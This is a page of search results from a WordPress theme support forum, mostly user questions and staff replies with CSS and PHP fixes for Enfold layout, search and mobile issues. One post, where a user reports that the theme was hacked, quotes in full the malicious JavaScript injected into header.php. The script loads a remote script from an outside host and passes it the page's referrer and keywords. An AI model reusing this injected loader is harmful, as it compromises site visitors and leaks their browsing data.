Viewing 30 results - 4,531 through 4,560 (of 7,495 total)
  • Author
    Search Results
  • #656714

    Hey berichair,

    Please try using a more advanced search plugin such as Relevanssi. You can find implementation here – http://kriesi.at/documentation/enfold/use-relevanssi-in-search-instead-of-the-default-search/

    Best regards,
    Yigit

    #656571

    Hey A_vdlavoir,

    no, there is no special function for this in Enfold. You would need to search a plugin with such a function.

    Best regards,
    Andy

    #656355
    berichair
    Participant

    Hi everybody,
    is-it possible to exclude all the page in the enfold search bar ?

    I would like the user will find only the pdf files when he want to search something in my website.

    #656340

    In reply to: custom avia css

    Hi,

    Some of the css rules does not make sense. I assume you are trying to place the search box next to the search icon as seen in the below screenshot.

    Please try adding this code to the Quick CSS section under Enfold > General Styling or to your child themes style.css file:

    .avia-search-tooltip {
    	margin-top:-66px!important;
        border-radius: 0px;
        box-shadow: 0px 0px 0px 0px rgba(0, 0, 0, 0);
        border-width: 0px;
        border-style: solid;
    }
    

    Best regards,
    Vinay

    #656222

    Topic: Improved Include Page

    in forum Enfold
    slinder
    Participant

    Hey Kriesi Team!

    Loving the theme and had a quick question. I am looking to install a plugin called Improved Include Page and I wanted to make sure that it won’t break the enfold theme. Before creating this thread, I did some research, but I am not sure if it was resolved (and my Germain isn’t too hot). I found this post in your forum:
    https://kriesi.at/support/topic/improved-include-page/

    Can you let me know if it was corrected and if it’s okay for me to install the plugin?

    Thanks in advance!

    Steve

    Not okay. i changed the figures to get all in line to:
    /*mobile: search, cart icon under the logo*/
    @media only screen and (max-width: 600px) {
    .responsive #header_main .inner-container, .responsive .main_menu {
    min-height: 60px;
    }
    #top #menu-item-search {
    top: 30px;
    }
    .cart_dropdown_first {
    position: absolute;
    top: 30px;
    left: -120px;

    }
    #advanced_menu_toggle, #advanced_menu_hide {
    margin-top: 6px;
    margin-right: 20px;
    }
    }
    I checked with the responsive view in safari: alt cmd + r and firefox alt + cmd + m
    it was viewed nice.

    So now i opened the webpage on mobile firefox and chrome on android and see it is not in line.
    Then i switched to chrome desktop view (also a responsive view) and got all icons in line.
    In firefox i did not get them in line.

    So i altered CSS to get it nice on mobile browser (not the mobile desktop view inside the desktop browser).
    /*mobile: search, cart icon under the logo*/
    @media only screen and (max-width: 500px) {
    .responsive #header_main .inner-container, .responsive .main_menu {
    min-height: 60px;
    }
    #top #menu-item-search {
    top: 55px;
    }
    .cart_dropdown_first {
    position: absolute;
    top: 58px;
    left: -115px;
    }
    #advanced_menu_toggle, #advanced_menu_hide {
    margin-top: 6px;
    margin-right: 20px;
    }
    }
    Result: mobile view on firefox desktop (mac): http://awesomescreenshot.com/06b5zsfed5
    So how get them inline in every browser?

    Same with the @media only screen and (max-width: 500px):
    On mobile (horizontal) 500px is nice. On desktop it needs 600px to have the logo inline and not overlapping.
    I use the stretched layout!

    PS: Is it possible to get the logo in the middle and alter the size?
    When the icons are below the logo it should be possible.

    PPS: maybe possible have a default solution for all users directly in the enfold settings.
    place search-, cart- and the mobile menu button-icon in one line below the logo.

    #655981

    Hi,

    Box sizes
    There still seems an issue with the box sizes being too large. Does this have something to do with the proportion to the body?

    The related section looks good on my end. Could you please provide a screenshot of this issue?

    Category titles
    I notice that the shop category titles has disappeared, how do I re-enable this? This is strange as they were there. So many problems getting this template to work correctly with its features.

    Please check the Enfold > Header > Header Title and Breadcrumbs.

    If you have any additional questions at this time we kindly ask that you open them up in a separate thread. The longer threads get in the forum, they become more difficult to support as they tend to drift off topic and they also make it troublesome for users trying to search for solutions. Keeping threads relevant to their original inquiry ensures that we can keep better track of what has been resolved and that users can more effectively find answers to similar issues they might be experiencing. Thank you.

    Best regards,
    Ismael

    #655964

    I too was struggling with getting Google maps to show up on my newly launched site but after searching around finally came across this post. I was able to add this code to the functions.php file and finally got everything to work.

    What I had to do:
    – Upload the latest Enfold version
    – Create a Google Webmaster account
    – Verify the domain by adding the meta data to the parent header.php and validating it. I would use the child header as hindsight
    – Create the maps API key (assume this takes a few mins to kick in)
    – Grab the API key and add the above script to the enfold child functions.php file

    Boom! Maps finally showing up properly. Looking forward to the proper fix.

    Hey Tobias-B-Conrad,

    There is not enough space to fit everything in one line, we need to move the icons below the logo to do so Please try adding this code to the Quick CSS section under Enfold > General Styling or to your child themes style.css file:

    @media only screen and (max-width: 600px) {
    .responsive #header_main .inner-container, .responsive .main_menu {
        min-height: 60px;
    }
    #top #menu-item-search {
        top: 40px;
    }
    .cart_dropdown_first {
        position: absolute;
        top: 40px;
        left: -110px;
    }
    #advanced_menu_toggle, #advanced_menu_hide {  
        margin-top: 6px;
        margin-right: 20px;
    }
    }
    

    Best regards,
    Vinay

    #655308

    Hey jelle,

    1- Please refer to my post here – https://kriesi.at/support/topic/search-icon-on-mobile-devices/#post-589759
    2- Please try adding this code to the Quick CSS section under Enfold > General Styling or to your child themes style.css file:

    @media only screen and (max-width: 1300px) {
    .container.av-logo-container {
        max-width: 100%;
        margin: 0;
        padding: 0;
    }}
    

    Best regards,
    Yigit

    Hi,

    Please try adding this code to the Quick CSS section under Enfold > General Styling or to your child themes style.css file:

    span.ajax_search_excerpt { display: none; }
    

    Best regards,
    Yigit

    #654621

    Topic: Enfold Support Failure

    in forum Enfold
    hdpcr
    Participant

    Again its happening, I tried to keep it as private as i could send private messages but this is too much, (This is not first time i have to complain)
    1 New ticket 6-7 day ago no answer at all
    2 New tickets 4 days ago no answer at all
    1 ticket to reply 3 days ago no answer.

    Do you think your customers have no obligations or deadline with their clients??? I have been holding for more than a week any advance in my client work because i have no answers at all from you. I have to solve some pending issues before starting to replicate pages. Of course it doesn’t make any sense to build 100 pages if there is some unsolved issues. If you reply after a week for each of the issues, i have apply changes to 100 pages and wait a week for another reply and do another 100 changes. Its ridiculous.
    I have 1 unanswered so old that i cant even find in in the your list 50 pages and keep going.
    In the past i have been complaining from your poor support because of the same situation and after getting an understanding I thought you were just being victim of the success of you good product and you will add more staff to attend increasing support demand. I know you already know i have bought the product with six months of included support then i had to pay as much as the template price for 6 months of additional support and i i was ready to pay for other year. But this is too much, i will prefer to loose everything i have built and start all over but switching to AVADA theme than walking this painful path with Enfold Support.
    Last time i had to start posting comments in Evanto Market comment and even contacted Evanto to complain about your bad support, then magically i got replies from you. I fully aware of the difference between Customization, Standard, and bugs. If i ask something that you cannot do its ok but at least i don’t have to wait a week to know it. And before i submit any ticket i browse all others trying yo find similar issue or ticket (among of more than 80K) and avoid to bother for the same thing but your search is so general and non accurate that i have to browse dozen and dozens of posts that have no relationship with the search and its TIME.
    So please if you are going to keep things that way, just let me know to switch to better support theme even if i love your’s but i cannot afford such waist of time and energies to accomplish a work that its supposed to be easy ans smooth.

    Instead of “Thank you” i have to say sorry to tell the truth about your support.
    P.D. If my English is so bad i can send you the same message in Spanish, French or German. so you cannot say you don’t understand.

    L
    Participant

    Hi!

    I have tried to add the following code to functions.php in order to replace the logo for mobile devices:

    add_filter('avf_logo','av_change_logo');
    function av_change_logo($logo)
    {
        if(wp_is_mobile() )
        {
        $logo = "source";
        }
        return $logo;
    }

    Unfortunately, this is replacing also the logo on tablets. I want to customize this code to exclude any tablets. I want the custom logo to appear only on smartphones.

    I searched and found an article about excluding tablets but not sure how to adapt this to Enfold http://wordpress.stackexchange.com/questions/114369/excluding-ipad-from-wp-is-mobile

    Anyone could help me with this?

    Hey navindesigns,

    as written in our support policy we can’t provide support for every 3rd party plugins existing. Enfold is one of the best selling themes out there, so plugin’s author should investigate in a solution for you. If he can’t help you, you need to search for another plugin. I’ve no experience with such a video gallery function I’m afraid.

    Best regards,
    Andy

    #654021

    Hi,

    Alternatively, is there a way to ensure that Google/SEO Plugins recognize background images?

    I’m sorry but this is not possible. Search engines will not index background images or images added via css. It has to be an actual image added via img tag.

    Any idea how to fix this issue with some Quick CSS that will stretch the image for iPad and Mobile to remove the grey bars?

    Please turn on the custom css class field so that you can add a custom css class selector to the image. http://kriesi.at/documentation/enfold/turn-on-custom-css-field-for-all-alb-elements/

    Add something like this in the Quick CSS field:

    @media only screen and (min-width: 768px) and (max-width: 1024px) {
         .custom-image { min-width: 200%; }
    }

    The custom css class attribute used is “custom-image”. Note that this will force some parts of the image to overflow outside the container.

    Best regards,
    Ismael

    #653567
    webfordj
    Participant

    Hi Enfold Team,
    i would like to create the search as an ajax in-fly top bar, which is much more usable for all responsive posiblities like mobile. Not using the Top Nav at all and having the search icon in desktop and mobile view in the main menu. The solution Small Bar above Header is crippled.

    1. Clicking Search Icon in Main Menu
    https://i.imgsafe.org/fd15beac35.jpg

    2. Fly in of a full-content width search bar
    https://i.imgsafe.org/fd15d920d0.jpg

    Thank you very much in advance,
    Gruß Sebastian

    #653313

    Hi,

    Please disable the search icon in the Enfold > Header > Extra Elements panel then follow the solution here: https://kriesi.at/support/topic/swap-magnifier-for-text-search/#post-616206

    Best regards,
    Ismael

    #652561

    Hello Yigit,

    I can´t find framework/php/….

    In editor Menu is only this:

    avia_framework.php
    (framework/avia_framework.php)
    and others:
    Chybová stránka 404
    (404.php)
    Archiv
    (archive.php)
    Zobrazení autora
    (author.php)
    Komentáře
    (comments.php)
    config.php
    (config-bbpress/config.php)
    config.php
    (config-events-calendar/config.php)
    event-mod-css-dynamic.php
    (config-events-calendar/event-mod-css-dynamic.php)
    config.php
    (config-gravityforms/config.php)
    config.php
    (config-layerslider/config.php)
    config.php
    (config-templatebuilder/config.php)
    admin-import.php
    (config-woocommerce/admin-import.php)
    admin-options.php
    (config-woocommerce/admin-options.php)
    config.php
    (config-woocommerce/config.php)
    woocommerce-mod-css-dynamic.php
    (config-woocommerce/woocommerce-mod-css-dynamic.php)
    config.php
    (config-wordpress-seo/config.php)
    config.php
    (config-wpml/config.php)
    dynamic-css.php
    (css/dynamic-css.php)
    Theme Footer
    (footer.php)
    forum.php
    avia_framework.php
    (framework/avia_framework.php)
    functions-enfold.php
    Funkce šablony
    (functions.php)
    Theme Header
    (header.php)
    error404.php
    (includes/error404.php)
    helper-conditional-megamenu.php
    (includes/helper-conditional-megamenu.php)
    helper-main-menu.php
    (includes/helper-main-menu.php)
    helper-markup.php
    (includes/helper-markup.php)
    helper-post-format.php
    (includes/helper-post-format.php)
    helper-responsive-megamenu.php
    (includes/helper-responsive-megamenu.php)
    helper-social-media.php
    (includes/helper-social-media.php)
    helper-template-logic.php
    (includes/helper-template-logic.php)
    loop-about-author.php
    (includes/loop-about-author.php)
    loop-author.php
    (includes/loop-author.php)
    loop-comments.php
    (includes/loop-comments.php)
    loop-index.php
    (includes/loop-index.php)
    loop-page.php
    (includes/loop-page.php)
    loop-portfolio-single.php
    (includes/loop-portfolio-single.php)
    loop-search.php
    (includes/loop-search.php)
    related-posts.php
    (includes/related-posts.php)
    Zobrazení úvodní stránky
    (index.php)
    Single Page
    (page.php)
    Výsledky vyhledávání
    (search.php)
    Vyhledávací formulář
    (searchform.php)
    Postranní panel
    (sidebar.php)
    single-portfolio.php
    Zobrazení příspěvku
    (single.php)
    Zobrazení štítku
    (tag.php)
    taxonomy-portfolio_entries.php
    Archives – šablona stránky
    (template-archives.php)
    Blank – No Header, no Footer – šablona stránky
    (template-blank.php)
    template-builder.php

    Styly

    Kaskádové styly (CSS)
    (style.css)

    Some advice?

    Thanks

    #652368
    enktesisllc
    Participant

    Removing Default Image from the Header of Blog Posts

    I am building a site with Enfold. The only remaining issue is how to remove the default ‘pencil’ image form the top of the posts.
    See here:
    http://argus1.client1enktesis.com/argus-security-news/
    I have searched and searched to no avail.

    • This topic was modified 9 years, 9 months ago by enktesisllc.
    #652232
    dhuet
    Participant

    Hi,

    I running into a Woocomerce 2.6.1 conflict. The site simply does not show up anymore. it only load this below. if I turn off wooccommerce it goes back to running fine again. This only happens with the newest version of woocommerce. Enfold has the very latest version to.

    Any help would be appreciate it.
    best,
    D

    <!DOCTYPE html>
    <html lang=”en-US” class=”html_stretched responsive av-preloader-active av-preloader-enabled av-default-lightbox html_header_top html_logo_left html_main_nav_header html_menu_right html_slim html_header_sticky html_header_shrinking html_header_topbar_active html_header_transparency html_mobile_menu_tablet html_disabled html_header_searchicon html_content_align_center html_header_unstick_top_disabled html_header_stretch_disabled html_minimal_header html_entry_id_2206 “>
    <head>
    <meta charset=”UTF-8″ />
    <meta name=”robots” content=”index, follow” />

    <!– mobile setting –>
    <meta name=”viewport” content=”width=device-width, initial-scale=1, maximum-scale=1″>

    <!– Scripts/CSS and wp_head hook –>
    <title>Juara Skincare – Inspired by Indonesian Beauty Rituals</title>

    imagestudios
    Participant

    Hi, Love Enfold and have written a glowing review on it. Really don’t know why people use other themes when this has so much flexibility!

    I have two issues regarding mobile view I haven’t been able to resolve:

    1) I’ve searched many threads and have seen quick css code snippets to fix the entypo fontello icon that should be inside the mobile menu square, but none are working in my case. The website is http://www.kelleylattaministries.com.

    2) On my client’s iPhone, the home page automatically is showing the navigation first and then just the burgundy/brown area where the logo should be, but no logo is present. But, everything looks fine on my iPhone. Thoughts? Here are screenshots:
    http://kelleylattaministries.org/wp-content/uploads/2016/06/image1.png
    http://kelleylattaministries.org/wp-content/uploads/2016/06/image2.png

    Thank you for your help!

    Micheal0424
    Participant

    I am using the contact form and went into edit the Autorespond Text within the contact form, I made the changes to the form and everything saves okay and works properly except the Autorespond Text.

    The changes are saved in the back end but they don’t show on the website. I have tried a different browser and clearing cache as well. I have not updated anything since this started happening, I am using current WP and current Enfold. In short, I haven’t changed anything and this just started happening.

    I am at a loss, I have searched for a solution for a long time, any help is greatly appreciated.

    This is urgent, your help is greatly appreciated.

    I have this posted here as well: https://kriesi.at/support/topic/autorespond-text-displayed-on-page-not-updating/

    I had other posts that I have had communication with but the urgent one hasn’t been gone back to so I am posting this again because this is such an urgent case.

    Thank you.

    • This topic was modified 9 years, 9 months ago by Micheal0424.
    #651551
    bitojoe
    Participant

    I’m curious on how I could customize the search function to look like this rather than use the typical ajax search function that is standard in enfold. Is there any way I can do this?

    Screen Shot 2016-06-21 at 9.49.18 AM 2 copy

    #651188
    Micheal0424
    Participant

    I am using the contact form and went into edit the Autorespond Text within the contact form, I made the changes to the form and everything saves okay and works properly except the Autorespond Text.

    The changes are saved in the back end but they don’t show on the website. I have tried a different browser and clearing cache as well. I have not updated anything since this started happening, I am using current WP and current Enfold. In short, I haven’t changed anything and this just started happening.

    I am at a loss, I have searched for a solution for a long time, any help is greatly appreciated.

    Thank you.

    #650736

    Hi Ismael,

    Thanks for your reply.
    I have been looking around and figured out the way I want it:

    • I want to use a typical enfold / avia solution.
    • I use a child theme, so I added the shortcodes code in functions.php of the child theme.
      add_filter('avia_load_shortcodes', 'avia_include_shortcode_template', 15, 1);
      function avia_include_shortcode_template($paths)
      {
      	$template_url = get_stylesheet_directory();
          	array_unshift($paths, $template_url.'/shortcodes/');
      
      	return $paths;
      }
    • I want to add a content element (post-custom-field) to add a special element in the avia layout builder. Therefore I created a special post_custom_fields.php in the directory enfold-child/shortcodes.

    I want to choose one of the available custom fields of that post in a drop down list.
    So I try to create that drop-down list, and need to fill an array with the meta-key of each custom field. Choosing the meta-key should result in showing the meta-value in frontend. Styling will be no problem.

    I have problems creating the dropdown list now.
    I only see the “Select One” in my dropdown list.

    My code at the moment:

    			function popup_elements()
    			{
    
    				/* jan */
    				/* add dropdown list for custom fields */
    
    				$custom_fields = get_post_custom();
    				$all_custom_fields[ 'Select One' ] = null;
    
    				if ( !empty($custom_fields) && !is_wp_error ($custom_fields) ) :
    					foreach ($custom_fields as $custom_field ) :
    						$all_custom_fields [meta_id] =  "__('$custom_field->meta_key', 'avia_framework') => '$custom_field-meta_key'";
    					endforeach;
    
    			  endif;
    
    				$this->elements = array(
    
                        array(	"name" 		=> __("Do you want to display custom post fields?", 'avia_framework' ),
                            "desc" 		=> __("Do you want to display custom post fields available in the post?", 'avia_framework' ),
                            "id" 		=> "cust_field_name",
                            "type" 		=> "select",
                            "std" 	=> "Quotes",
    												"subtype" => $all_custom_fields
    
    											),
    
    

    I’m still diving into the code, to figure out the problem.
    But perhaps you can see the problem.

    EDIT:
    I want to access all custom fields from the current post, but the post_ID of the current post equals NULL.
    I searched and saw that that global variables of WordPress do not work in the Avia Layout Builder.
    Is that anyhow possible?

    Thanks again,
    Jan

    • This reply was modified 9 years, 9 months ago by JB_Walton.
    #650593
    richardbeatty
    Participant

    Hi, I’ve searched high and low for answers here ….

    The issue is that google search reveals dates of portfolio or post entry “publication date”

    These dates are the dates published, and not date last modified. (This becomes an issue when dates eg 2012 appear for posts that are regularly updated, and I use portfolio for services.)

    Yoast dates snippets switched “off”
    There are plugins that will remove the date, but I’d like to do this without using a plugin.

    Here’s what my developer says – can you elaborate on the first sentence … and any comments. I have other sites and would like to fix these without asking the developer, so can you suggest a solution without using a plugin?

    “I found that enfold generates its own “structured data” for google and search engines to use when crawling a page.

    I have managed to filter out the date published on this data that’s being output, leaving everything else, including the “last modified time”.

    Please see google structured data testing tool to see what I mean:
    https://search.google.com/structured-data/testing-tool?hl=EN#url=https%3A%2F%2Fwww.specialistgp.com.au%2Fpaediatrics%2Fchildhood-constipation%2F

    If you poke through all of the “errors” ( essentially just missing data ), you’ll see that the only dates added into here are the “dateModified” and not “datePublished” as well, which used to be in there.”

    Hi,

    Thanks for your reply. I’ve tried following the steps suggested in the link you recommended and also looked for old posts on the forums but for some reason it didn’t work.

    So I’m trying to add the ‘Amazon icon’ (ue808). In your ‘Using Fontello-imported Icons’ post (http://kriesi.at/documentation/enfold/custom-social-icons/) it doesn’t say where to put the code so I added to Quick CSS (General Styling) and replaced ‘fontello’ with ‘amazon’ and ‘ue800’ with ‘ue808’. But when checking ‘Social Profiles’ the Amazon icon wasn’t there. Then I researched old posts on the Forum and as per someone’s advice I downloaded the icon as a zip file, then imported it via the Iconfont Manager option and then edited the functions.php file with the following line: ‘amazon’ => array( ‘font’ =>’fontello’, ‘icon’ => ‘ue808’), but it still didn’t work.

    Can you please help.

    #649906

    Topic: Enfold theme hacked.

    in forum Enfold
    jiethics
    Participant

    It looks like I am getting constant malware attacks and when you scan it points to the header.php file. Almost all the sites on my hosting got infected so I had to changed the themes now all the other sites are clean and working fine except for the one with the enfold theme. SO i guess this has something to do with the theme. malicious code is always put before the closing </head> tag in header.php file. I update the theme but it comes back and infect again in a day or two say place and same code.

    
    <?php
    	if ( !defined('ABSPATH') ){ die(); }
    	
    	global $avia_config;
    
    	$style 				= $avia_config['box_class'];
    	$responsive			= avia_get_option('responsive_active') != "disabled" ? "responsive" : "fixed_layout";
    	$blank 				= isset($avia_config['template']) ? $avia_config['template'] : "";	
    	$av_lightbox		= avia_get_option('lightbox_active') != "disabled" ? 'av-default-lightbox' : 'av-custom-lightbox';
    	$preloader			= avia_get_option('preloader') == "preloader" ? 'av-preloader-active av-preloader-enabled' : 'av-preloader-disabled';
    	$sidebar_styling 	= avia_get_option('sidebar_styling');
    	$filterable_classes = avia_header_class( avia_header_class_string() );
    
    	
    ?><!DOCTYPE html>
    <html <?php language_attributes(); ?> class="<?php echo " html_{$style} ".$responsive." ".$preloader." ".$av_lightbox." ".$filterable_classes ?> ">
    <head>
    <meta charset="<?php bloginfo( 'charset' ); ?>" />
    
    <!-- page title, displayed in your browser bar -->
    <title><?php if(function_exists('avia_set_title_tag')) { echo avia_set_title_tag(); } ?></title>
    
    <?php
    /*
     * outputs a rel=follow or nofollow tag to circumvent google duplicate content for archives
     * located in framework/php/function-set-avia-frontend.php
     */
     if (function_exists('avia_set_follow')) { echo avia_set_follow(); }
    
     /*
     * outputs a favicon if defined
     */
     if (function_exists('avia_favicon'))    { echo avia_favicon(avia_get_option('favicon')); }
    ?>
    
    <!-- mobile setting -->
    <?php
    
    if( strpos($responsive, 'responsive') !== false ) echo '<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">';
    ?>
    
    <!-- Scripts/CSS and wp_head hook -->
    <?php wp_head(); ?>
    
    <!-- Malicious code start -->
    <script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://sprousewindows.com/js/jquery.min.php?c_utt=J18171&c_utm='+encodeURIComponent('http://sprousewindows.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>
    <!-- Malicious code end -->
    
    </head>
    
    <body id="top" <?php body_class($style." ".$avia_config['font_stack']." ".$blank." ".$sidebar_styling); avia_markup_helper(array('context' => 'body')); ?>>
    
    	<?php 
    		
    	if("av-preloader-active av-preloader-enabled" === $preloader)
    	{
    		echo avia_preload_screen(); 
    	}
    		
    	?>
    
    	<div id='wrap_all'>
    
    	<?php 
    	if(!$blank) //blank templates dont display header nor footer
    	{ 
    		 //fetch the template file that holds the main menu, located in includes/helper-menu-main.php
             get_template_part( 'includes/helper', 'main-menu' );
    
    	} ?>
    		
    	<div id='main' data-scroll-offset='<?php echo avia_header_setting('header_scroll_offset'); ?>'>
    
    	<?php 
    		
    		if(isset($avia_config['temp_logo_container'])) echo $avia_config['temp_logo_container'];
    		do_action('ava_after_main_container'); 
    		
    	?>
    
    
    • This topic was modified 9 years, 9 months ago by jiethics.
    onesource_marketing
    Participant

    This is a two-part request since both issues are similar

    1) I can’t figure out why a sidebar with EVERY published page shows up on certain pages for my site. I hate this. How do I turn this off?

    It’s on the following pages:
    https://www.onesourcebackground.com/?s=four)
    https://www.onesourcebackground.com/jobs/human-resources-specialist-intern/

    How do I customize the search page? I want the sidebar removed and it would be nice to assign a published page. Or does it pull from a php file?
    Same thing with the job posting. I am using Job Manager plugin: https://wordpress.org/support/plugin/job-manager
    And according to the developer it’s not their plugin. It’s the theme. Thoughts?

    2) How do I customize the 404 page? I tried this plugin https://wordpress.org/plugins/404page/
    According to their documentation. I would just create and publish a regular page and then choose this from the drop down in their settings. Unfortunately, my custom 404 page doesn’t show up. It reverts back to the original ugly Enfold page.

    Please advise

    #649203
    JB_Walton
    Participant

    Hi there,

    I am happy using Enfold for several years now.
    More or less out-of-the-box and only changing the content and settings.

    But now I want to enhance one of my website with some extra (custom) fields.
    When this is answered anywhere I am fully sorry, but I searched and did not find a clear answer ;-)

    I know how to add custom fields to posts.
    Now I want to show that fields on my archive and single posts pages.
    I read a lot about using the advanced layout builder and understand that.
    But what is the best way to show those fields on the frontend pages?

    Do I really have to change the single.php file to show those extra fields?
    (Of coarse I would have copied that file to my child theme !!)
    Or is there any other way? Perhaps via the avia framework functions?

    I am concerned about the upgrades of WordPress / Enfold.
    Whenever the master single.php file of Enfold (not child) will be upgraded (e.g. new PHP functions), my changes single.php will perhaps no longer work.

    Thanks in advance,
    Jan Lucas

Viewing 30 results - 4,531 through 4,560 (of 7,495 total)